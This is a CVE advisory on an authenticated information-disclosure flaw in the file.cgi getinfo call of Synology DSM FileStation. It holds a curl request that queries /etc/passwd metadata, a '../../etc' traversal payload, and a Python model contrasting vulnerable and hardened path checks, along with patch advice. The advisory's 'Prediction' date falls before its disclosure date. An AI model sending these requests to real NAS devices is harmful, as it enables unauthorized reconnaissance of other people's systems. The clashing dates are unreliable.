How the CVE Works:
The vulnerability resides in the `file.cgi` component of the FileStation application in Synology DiskStation Manager (DSM). A remote attacker who already holds an authenticated session can send a crafted HTTP request to this CGI endpoint. The flaw is improper validation of user-supplied request parameters: by manipulating values such as file identifiers or path variables, the attacker can bypass the intended access controls and query files and directories outside the scope permitted to that user. The endpoint does not return file content; instead it returns metadata for objects the attacker should not be able to enumerate, such as file names, directory paths, timestamps and, potentially, sizes. The issue therefore grants no direct read or write access, but it discloses filesystem structure and data locations that support further targeted attacks.
DailyCVE Form:
Platform: Synology DSM
Version: Multiple versions
Vulnerability: Information Disclosure
Severity: Medium
Date: 2025-12-04
Prediction: 2025-01-15
What Undercode Say:
Analytics:
```bash
# Issue the FileStation getinfo call through the DSM Web API with an existing
# authenticated session cookie. Replace the <...> placeholders; -k disables
# TLS certificate verification and is only acceptable against a lab target.
curl -k -X GET "https://<TARGET_IP>:5000/webapi/entry.cgi?api=SYNO.FileStation.File&method=getinfo&version=1&additional=%5B%22real_path%22%5D&path=%5B%22/etc/passwd%22%5D" -b "sid=<VALID_SESSION_ID>"

# On the appliance itself: find references to file.cgi that mention getinfo
grep -r "file.cgi" /usr/syno/synoman/webapi/ | grep -i "getinfo"

# Inspect the CGI binary for the real_path handling and its surrounding strings
strings /usr/syno/synoman/webapi/file.cgi | grep -A5 -B5 "real_path"
```
How Exploit:
An authenticated attacker sends a crafted HTTP request to the `getinfo` method of `file.cgi` with a path traversal payload (for example `../../etc`) to query locations outside the permitted scope and reads the returned metadata from the JSON response.
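As an added illustration of the mechanism described above (the access-control bypass in the explanation and the traversal payload in the exploit description), the following Python model is not code from the original post or from Synology; it mocks a FileStation-style `getinfo` handler over a constructed temporary directory tree. The share layout, the user-to-share mapping, the response shape and the function names (`build_sandbox`, `getinfo_vulnerable`, `getinfo_hardened`) are assumptions made for the demonstration. The vulnerable handler authorizes on the raw request string and only then resolves it, so `..` segments and a sibling share with a shared name prefix both slip through; the hardened handler canonicalizes first, authorizes component-wise on the canonical path, and answers out-of-scope paths identically whether or not they exist.

```python
"""Added example, not the original post's or Synology's code: a minimal model of a
FileStation-style getinfo handler, showing a path-scope bypass and its fix.
All paths, shares and responses below are constructed for the illustration."""
import os
import tempfile
from typing import Any, Dict, List


def build_sandbox() -> str:
    """Constructed directory tree standing in for a DSM volume (sample data only)."""
    root = tempfile.mkdtemp(prefix="dsm_demo_")
    for rel in (
        "volume1/homes/alice/notes.txt",
        "volume1/homes/alicex/secret.txt",  # sibling share sharing a name prefix
        "volume1/finance/payroll.xlsx",
        "etc/passwd",
    ):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("constructed sample\n")
    return os.path.realpath(root)


def _metadata(path: str) -> Dict[str, Any]:
    """The kind of fields a getinfo-style call returns (name, size, type, real_path)."""
    st = os.stat(path)
    return {
        "name": os.path.basename(path),
        "size": st.st_size,
        "isdir": os.path.isdir(path),
        "real_path": path,
    }


def getinfo_vulnerable(root: str, permitted: List[str], requested: str) -> Dict[str, Any]:
    """Authorizes on the raw string and then resolves it, so the check and the
    lookup disagree: '..' segments and prefix-sharing siblings both pass."""
    rel = requested.lstrip("/")
    if not any(rel.startswith(share) for share in permitted):
        return {"success": False, "error": "permission denied"}
    target = os.path.join(root, rel)  # '..' is still in here; the kernel resolves it
    if not os.path.exists(target):
        return {"success": False, "error": "no such file"}
    return {"success": True, "data": _metadata(target)}


def getinfo_hardened(root: str, permitted: List[str], requested: str) -> Dict[str, Any]:
    """Canonicalize first (realpath also follows symlinks), authorize on the
    canonical path component-wise, and never stat anything outside scope."""
    root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root, requested.lstrip("/")))
    in_scope = False
    for share in permitted:
        share_root = os.path.realpath(os.path.join(root, share))
        # commonpath compares whole components, so homes/alicex is not under homes/alice
        if os.path.commonpath([share_root, target]) == share_root:
            in_scope = True
            break
    if not in_scope:
        # Identical answer whether or not the path exists: no existence oracle
        return {"success": False, "error": "permission denied"}
    if not os.path.exists(target):
        return {"success": False, "error": "no such file"}
    return {"success": True, "data": _metadata(target)}


if __name__ == "__main__":
    sandbox = build_sandbox()
    alice_shares = ["volume1/homes/alice"]
    for path in (
        "volume1/homes/alice/notes.txt",
        "volume1/homes/alice/../../../etc/passwd",
        "volume1/homes/alicex/secret.txt",
    ):
        print(path)
        print("  vulnerable:", getinfo_vulnerable(sandbox, alice_shares, path))
        print("  hardened:  ", getinfo_hardened(sandbox, alice_shares, path))
```

Checking scope before calling `stat` is deliberate: if the handler answered "no such file" for out-of-scope paths that do not exist and "permission denied" for those that do, the error string itself would become the enumeration oracle the advisory warns about.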
Protection from this CVE:
Apply the Synology DSM update that addresses this issue.
Restrict FileStation access to the accounts that need it.
Implement network segmentation so the DSM management interface is not reachable from untrusted networks.
Impact:
Sensitive filesystem enumeration.
Information leakage.
Initial reconnaissance foothold.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

